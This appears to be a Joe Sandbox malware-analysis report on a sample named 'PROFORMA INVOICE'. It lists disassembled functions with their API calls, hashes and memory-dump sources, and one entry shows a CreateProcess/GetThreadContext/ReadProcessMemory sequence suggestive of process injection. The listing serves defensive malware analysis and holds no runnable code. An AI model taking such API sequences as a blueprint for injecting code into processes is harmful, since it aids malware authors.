Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction Fuzzy Hash: 82515CB1904218AFDB14AF64DC81BEDBBB9FF49300F1000AEB659A3241DB756A809F58

Function 00F640E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FD3725
GetOpenFileNameW.COMDLG32 ref: 00FD376F

Part of subcall function 00F6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F653B1,?,?,00F661FF,?,00000000,00000001,00000000), ref: 00F6662F

Part of subcall function 00F640A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F640C6

Strings

X, xrefs: 00FD373E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: ce05d7610084728299ae2ddd9848eaebcaa56a7ecc8af40ab724be811bb513a2
Instruction ID: 74cac883c4cf2c8368258015980970d0eb14163b65bfa1057618c146aa30bfc9
Opcode Fuzzy Hash: ce05d7610084728299ae2ddd9848eaebcaa56a7ecc8af40ab724be811bb513a2
Instruction Fuzzy Hash: 8421D571A00198AFCB02EFD4CC457DEBBF9AF49304F00801AE545EB241DFB86A899F65

Function 00FAC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00FAC72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FAC746

Strings

aut, xrefs: 00FAC740

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 6f7bb2fac174ba20ce2d5b8749f923bedd04e0b4c0bf41a50937a8c10c255937
Instruction ID: 9a5c6cfbdf48516b041b134e5b1a3a3f12799d49f2f3d475b89b2cf9531fd9c9
Opcode Fuzzy Hash: 6f7bb2fac174ba20ce2d5b8749f923bedd04e0b4c0bf41a50937a8c10c255937
Instruction Fuzzy Hash: 41D05E7150030FABDB10AB90DC4EF8A776CA700704F0001A07790AD0B1DAB4E6998B54

Function 00FBF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb75d6ad5b50d95015458ad2c2114b76fd0595042b98de30fa5bfed30150bceb
Instruction ID: e7eb5ba1deee2472811f5f47e9407b88d24ee94fa559419bbc4aa79c90437fb4
Opcode Fuzzy Hash: fb75d6ad5b50d95015458ad2c2114b76fd0595042b98de30fa5bfed30150bceb
Instruction Fuzzy Hash: 7CF14971A043019FC710DF25C981B5AB7E5FF88324F14892EF9999B292DB34E949DF82

Function 00F64FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F65022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F650CB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 2ecc5c7580e761a1ac9f647f685d28f758216825a0ae42e79b08ce65605fc55e
Instruction ID: f0a916111e9c4b0283e4664d06119a108d1977f6a900f8ff175960d509b73980
Opcode Fuzzy Hash: 2ecc5c7580e761a1ac9f647f685d28f758216825a0ae42e79b08ce65605fc55e
Instruction Fuzzy Hash: 8831DFB1A04701DFC330DF64D88069BBBE4FF49714F10092EF69A93241E776A944DB92

Function 00F8395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00F83973

Part of subcall function 00F881C2: __NMSG_WRITE.LIBCMT ref: 00F881E9
Part of subcall function 00F881C2: __NMSG_WRITE.LIBCMT ref: 00F881F3

__NMSG_WRITE.LIBCMT ref: 00F8397A

Part of subcall function 00F8821F: GetModuleFileNameW.KERNEL32(00000000,01020312,00000104,00000000,00000001,00000000), ref: 00F882B1
Part of subcall function 00F8821F: ___crtMessageBoxW.LIBCMT ref: 00F8835F

Part of subcall function 00F81145: ___crtCorExitProcess.LIBCMT ref: 00F8114B
Part of subcall function 00F81145: ExitProcess.KERNEL32 ref: 00F81154

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

RtlAllocateHeap.NTDLL(01580000,00000000,00000001,00000001,00000000,?,?,00F7F507,?,0000000E), ref: 00F8399F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 00a9809168d38b690b49e755b0db676d570b58ce2228bc4b41f1ea7ac5836a6c
Instruction ID: cecab49f537d8ead868dd2bc9c01161e8732849fe625cc8130fa170449ca3e7a
Opcode Fuzzy Hash: 00a9809168d38b690b49e755b0db676d570b58ce2228bc4b41f1ea7ac5836a6c
Instruction Fuzzy Hash: 900192367457119AEA213B24DC46BEA335A9B82B70B310125F9059B1A5DFF8DD01A7A0

Function 00FAC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FAC385,?,?,?,?,?,00000004), ref: 00FAC6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FAC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FAC708
CloseHandle.KERNEL32(00000000,?,00FAC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FAC70F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: e96afc08307ea48caeb00763e6954d459eb0a6cebee82cb9bf42d909efad68c9
Instruction ID: 1977d553d1b8cbede262ed394040cf200634d5563129ccb36b10add2dd7b1e9b
Opcode Fuzzy Hash: e96afc08307ea48caeb00763e6954d459eb0a6cebee82cb9bf42d909efad68c9
Instruction Fuzzy Hash: ACE08632140218BBEB211B54AC49FCA7B19AB05B70F104110FB146D0E097B22511A799

Function 00FABB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FABB72

Part of subcall function 00F81C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00F87A85), ref: 00F81CB1
Part of subcall function 00F81C9D: GetLastError.KERNEL32(00000000,?,00F87A85), ref: 00F81CC3

_free.LIBCMT ref: 00FABB83
_free.LIBCMT ref: 00FABB95

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction ID: 944442db8be8452b0084baa0ead06548b6014024cf9928fa299e885d6da4c883
Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction Fuzzy Hash: 4BE012E1A4174186DA2475796E48EF333DC5F463A1714091DB459E7147CF28F841A6B4

Function 00F62322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00F622A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F624F1), ref: 00F62303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F625A1
CoInitialize.OLE32(00000000), ref: 00F62618
CloseHandle.KERNEL32(00000000), ref: 00FD503A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 5c62d9a53045df46c7cd103e33629d734c97a5014e410df46b9c60fcc188d28f
Instruction ID: 7e49cc563beeea5cac86b4e82bad84ea473e687c0a89a0b6417c264d9f0c1f54
Opcode Fuzzy Hash: 5c62d9a53045df46c7cd103e33629d734c97a5014e410df46b9c60fcc188d28f
Instruction Fuzzy Hash: 1E71EFF49012958FC334EF6AE590458BBAAFB5A3407B4816EE0C9C7799CB3E0428DF15

Function 00FC0828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00FC08FD

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

_wcscpy.LIBCMT ref: 00FC098C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 59447ebd0fe0b2a3e943fb0a205dc570ce4850316411ccd2310d8aa3bbb754d4
Instruction ID: 41585f30fb7f9fe4d92c13ac577849b19c32e43b7174ab269434d7791bd51add
Opcode Fuzzy Hash: 59447ebd0fe0b2a3e943fb0a205dc570ce4850316411ccd2310d8aa3bbb754d4
Instruction Fuzzy Hash: 2D913C35A00605DFCB18DF18C992AA9B7E5EF49310B55806DE85A8F352DB34ED46DF80

Function 00F63A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00F63A73

Part of subcall function 00F81405: __lock.LIBCMT ref: 00F8140B

Part of subcall function 00F63ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F63AF3
Part of subcall function 00F63ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F63B08

Part of subcall function 00F63D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00F63AA3,?), ref: 00F63D45
Part of subcall function 00F63D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00F63AA3,?), ref: 00F63D57
Part of subcall function 00F63D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,01021148,01021130,?,?,?,?,00F63AA3,?), ref: 00F63DC8
Part of subcall function 00F63D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00F63AA3,?), ref: 00F63E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F63AB3

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: 9e6576f2702801fabbda713333a7ca8c29d4bd091cb46eda35abae05eb854742
Instruction ID: 60c1aca9083373584a5a982da332f4f27864c28d922524bdb2be09fff8543c94
Opcode Fuzzy Hash: 9e6576f2702801fabbda713333a7ca8c29d4bd091cb46eda35abae05eb854742
Instruction Fuzzy Hash: 1111D2719083459FC320EF65EC4590AFBE8FF94310F108A1FF484872A1DBB99641DB92

Function 00F8E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00F8EA29
__close_nolock.LIBCMT ref: 00F8EA42

Part of subcall function 00F87BDA: __getptd_noexit.LIBCMT ref: 00F87BDA

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: e79007ac9beba76432c6357fec1b7692698e51dc02e0af0211e55aef410d488b
Instruction ID: 132a7d52486077a9f6afa950334d1646aea938acb5e406cc0b38360e790d53fc
Opcode Fuzzy Hash: e79007ac9beba76432c6357fec1b7692698e51dc02e0af0211e55aef410d488b
Instruction Fuzzy Hash: CA1182729097109ED72ABF68CC413D87A616F82731F264340E4715F1E6CBBC9841B7A5

Function 00F7F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00F8395C: __FF_MSGBANNER.LIBCMT ref: 00F83973
Part of subcall function 00F8395C: __NMSG_WRITE.LIBCMT ref: 00F8397A
Part of subcall function 00F8395C: RtlAllocateHeap.NTDLL(01580000,00000000,00000001,00000001,00000000,?,?,00F7F507,?,0000000E), ref: 00F8399F

std::exception::exception.LIBCMT ref: 00F7F51E
__CxxThrowException@8.LIBCMT ref: 00F7F533

Part of subcall function 00F86805: RaiseException.KERNEL32(?,?,0000000E,01016A30,?,?,?,00F7F538,0000000E,01016A30,?,00000001), ref: 00F86856

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: f592a43aa759179d015f9b8dff96bf408ab8d83ddfb154f20d8fda74eaa67846
Instruction ID: 5a1e607146805dd3815dcc38aed3756bafb12155a220098d0600b81945808ce1
Opcode Fuzzy Hash: f592a43aa759179d015f9b8dff96bf408ab8d83ddfb154f20d8fda74eaa67846
Instruction Fuzzy Hash: 62F0DC3140020EA7CB04BEA9DC019DE77E8AF00724F64803AF908D6182DBB89745A7A6

Function 00F835E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

__lock_file.LIBCMT ref: 00F83629

Part of subcall function 00F84E1C: __lock.LIBCMT ref: 00F84E3F

__fclose_nolock.LIBCMT ref: 00F83634

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: b36d0d7efdd7951b9cd8d73e8364d3a0e9007ba3d0c940ddc77384d9f9a8a122
Instruction ID: 6391e5f50ce7baa8fa8a5299e46a12347a35f38346a8b80fb0ee80ef65cbafe6
Opcode Fuzzy Hash: b36d0d7efdd7951b9cd8d73e8364d3a0e9007ba3d0c940ddc77384d9f9a8a122
Instruction Fuzzy Hash: A8F0B432801305AADB117F69CC02BEE7AA06F41B34F258108E420EB2E1DB7C9A01BF55

Function 017DBF1D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 017DC6DB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017DC771
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017DC793

Memory Dump Source

Source File: 00000000.00000002.1705514040.00000000017DA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17da000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction ID: 08d7355b11cbc8a395e5eb4386d2619bb735fd62173c2973fd862bc93360db7e
Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction Fuzzy Hash: 2B12CD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 00F82957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00F82A0B

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 37b71acb36ae4d94b19ce1339d72acb129bfb1a8acfae77f78717a3b382ca180
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: 86419271B007069FDF6CAEA9C8815EE77A6AF45360B24852DE855C7240EB78ED41BB40

Function 00F7ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00F7EDC7

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 243da7b4ef8266541657d89a4b87992a06b662b87770074d79ca51719b392b69
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 0031D671A001059FC728DF58C490AA9FBA6FB49350B64C6E7E40DCB265DB30EDC1EB81

Function 00FC040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FC0519

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a374233287f15c01604fe775a9b7565688dd77d36503e8119b72f67de5cd8c5d
Instruction ID: b27c8caf1d2c0450943acc83c94874dc686690c4edfd3a8d7f4c19f0734ae058
Opcode Fuzzy Hash: a374233287f15c01604fe775a9b7565688dd77d36503e8119b72f67de5cd8c5d
Instruction Fuzzy Hash: 5D31C476104525CFCB01EF10C592B6E77B0FF49320F14884EE9951B386DB74A906EF82

Function 00FD9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00FD9A80

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 7bca558314b30c0366131b8b5937b4ce79c071bb15e0f8d2e9cafc549862a601
Instruction ID: fefeff981e2e3634d5dec98e1a62cd2a018158e8372f84e2c7c33e661c3ea71c
